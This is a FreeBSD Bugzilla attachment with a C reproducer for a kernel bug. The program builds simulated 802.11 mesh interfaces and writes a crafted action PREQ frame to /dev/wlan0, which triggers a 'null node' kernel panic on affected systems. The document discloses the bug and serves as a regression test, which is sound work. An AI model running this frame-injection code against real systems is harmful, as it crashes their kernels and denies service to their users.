FreeBSD Bugzilla – Attachment 239923 Details for
Bug 269343
bad 802.11 mesh PREQ packet can generate panic: null node from hwmp_send_action()
generate an 802.11 mesh action PREQ frame that causes panic: null node
wtap19c.c (text/plain), 1.98 KB, created by
Robert Morris
on 2023-02-05 18:22:18 UTC
Description:
generate an 802.11 mesh action PREQ frame that causes panic: null node
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-02-05 18:22:18 UTC
Size:
1.98 KB
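/*
 * Regression reproducer attached to FreeBSD bug 269343 ("bad 802.11 mesh
 * PREQ packet can generate panic: null node from hwmp_send_action()").
 *
 * It brings up two simulated wireless interfaces in mesh mode, builds a
 * 256-byte 802.11 management/action frame in user space and writes it to
 * /dev/wlan0.  On an affected kernel the expected outcome is the panic named
 * in the bug title, so this belongs on a disposable test machine or VM; it is
 * useful afterwards as a check that a patched kernel survives the write.
 *
 * Changes relative to the attachment as posted: the XOR loop no longer
 * type-puns the char buffer through a long long pointer (alignment and
 * strict-aliasing UB), the duplicated <sys/resource.h> include is gone, the
 * open(2) flag is spelled O_WRONLY instead of 1, failed setup commands are
 * reported instead of being silently ignored, and the descriptor is closed.
 * The bytes written to the device are unchanged.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net80211/ieee80211.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net80211/ieee80211_ioctl.h>

enum { WORD_LEN = 8 };	/* stride of the XOR mask, in bytes */

_Static_assert(sizeof(unsigned long long) == WORD_LEN,
    "mask entries are expected to be 8 bytes wide");

/*
 * XOR mask applied to a buffer pre-filled with 0xff, one 8-byte word per
 * entry.  A zero entry leaves the corresponding eight bytes at 0xff.
 */
unsigned long long aa[] = {
	0x4300ull,
	0x0ull,
	0x1f000000000000ull,
	0x40e07cfef2ull,
	0x0ull,
	0x0ull,
	0x6567ff00ull,
	0x42a37d000000ull,
	0x80000000000000ull,
	0x0ull,
	0xf9000000000000ull,
	0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull,
	0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull,
	0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull, 0x0ull,
};
int aai;	/* index of the next unused entry in aa[] */

/*
 * Run one setup command through system(3).  A non-zero status is reported
 * but not fatal: steps such as "kldload wtap" fail harmlessly when the
 * module is already loaded, and the original program ignored every status.
 */
static void
run(const char *cmd)
{
	int status = system(cmd);

	if (status != 0)
		fprintf(stderr, "warning: \"%s\" returned status %d\n",
		    cmd, status);
}

int
main(void)
{
	static const unsigned char dst_addr[6] =
	    { 0x00, 0x98, 0x9a, 0x98, 0x96, 0x97 };
	static const unsigned char src_addr[6] =
	    { 0x00, 0x98, 0x9a, 0x98, 0x96, 0x98 };
	struct rlimit r;

	/* Disable core dumps for this process. */
	r.rlim_cur = r.rlim_max = 0;
	setrlimit(RLIMIT_CORE, &r);

	run("kldload wtap");

	/*
	 * The /wtap helper is built from
	 * /usr/src/tools/tools/wtap/wtap/wtap.c; "c N" presumably creates
	 * simulated device wtapN -- confirm against that tool.
	 */
	run("/wtap c 0");
	run("ifconfig wlan0 create wlanmode mesh wlandev wtap0 meshid x");
	run("ifconfig wlan0 inet 1.1.1.1/24 up");

	run("/wtap c 1");
	run("ifconfig wlan1 create wlanmode mesh wlandev wtap1 meshid x");
	run("ifconfig wlan1 inet 1.1.1.2/24 up");

	/*
	 * Presumably opens the wtap visibility map and lets nodes 0 and 1
	 * hear each other in both directions -- confirm against vis_map.
	 */
	run("/vis_map o");
	run("/vis_map a 0 1");
	run("/vis_map a 1 0");

	/* Give the two mesh interfaces time to come up. */
	sleep(5);

	int fd = open("/dev/wlan0", O_WRONLY);
	if (fd < 0) {
		perror("/dev/wlan0");
		exit(1);
	}

	char buf[256];
	memset(buf, 0xff, sizeof(buf));

	/*
	 * Apply the mask word by word.  memcpy() is used instead of casting
	 * buf to a long long pointer, which is undefined for a char array
	 * that is not guaranteed to be suitably aligned.  The index check
	 * keeps the loop inside aa[] even if the table is ever shortened.
	 */
	for (size_t off = 0; off + WORD_LEN <= sizeof(buf); off += WORD_LEN) {
		unsigned long long word;

		if ((size_t)aai >= sizeof(aa) / sizeof(aa[0]))
			break;
		memcpy(&word, buf + off, WORD_LEN);
		word ^= aa[aai++];
		memcpy(buf + off, &word, WORD_LEN);
	}

	/* Overlay the 802.11 header fields that must be well-formed. */
	struct ieee80211_frame *wh = (void *)buf;

	wh->i_fc[0] = IEEE80211_FC0_TYPE_MGT |
	    IEEE80211_FC0_SUBTYPE_ACTION;

	memcpy(wh->i_addr1, dst_addr, sizeof(dst_addr));	/* dst */
	memcpy(wh->i_addr2, src_addr, sizeof(src_addr));	/* src */

	/* Turn on all net80211 debug output for wlan0 before sending. */
	run("sysctl -w net.wlan.0.debug=0xffffffff");

	if (write(fd, buf, sizeof(buf)) < 0)
		perror("write");

	close(fd);
	return 0;
}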